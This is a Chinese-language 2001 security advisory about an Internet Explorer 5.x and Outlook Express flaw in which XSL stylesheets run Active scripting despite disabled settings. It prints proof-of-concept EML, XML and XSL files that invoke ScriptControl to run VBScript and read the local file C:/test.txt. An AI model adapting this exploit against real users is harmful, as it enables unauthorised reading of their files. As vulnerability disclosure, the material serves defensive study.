XML脚本可在关闭active javascript的IE和OE上执行发布时间:2001-04-23 更新时间:2001-04-23 严重程度:高 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:客户机模式 受影响系统 Internet Explorer 5.x详细描述 在所有安全区域中关闭Active 脚本功能也可能通过XML和XSL的帮助 来执行Active 脚本。 问题存在在xml stylesheet可以包含Active scripting 并且他们忽略IE中的Active scripting设置。 测试代码 --xstyle.eml-------------------------------------------------------------- .... <IFRAME SRC="http://SOMEHOST/xstyle.xml"></IFRAME> .... -------------------------------------------------------------------------- --xstyle.xml-------------------------------------------------------------- <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="xstyle.xsl" ?> <doc> style </doc> -------------------------------------------------------------------------- --xstyle.xsl-------------------------------------------------------------- <xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl"> <xsl:script> <![CDATA[ a=new ActiveXObject('htmlfile'); a.open(); a.write("<html><body>gg</body></html>"); a.close(); v=new ActiveXObject("MSScriptControl.ScriptControl.1"); v.Language="VBScript"; v.eval('MsgBox ("This is VBSCRIPT",65,"This is VBSCRIPT")'); x=v.eval('GetObject("C:/test.txt","htmlfile")'); v.eval('MsgBox ("Hi",65,"Hi")'); a.location="about:Here is your file <BR>"+x.body.innerHTML; ]]> </xsl:script> </xsl:stylesheet> -------------------------------------------------------------------------- 请看演示: http://www.guninski.com/xstyle.eml 关闭脚本调试功能,如果还有窗口跳出说明存在问题。 解决方案 尚无 相关信息 Georgi Guninski http://www.guninski.com |
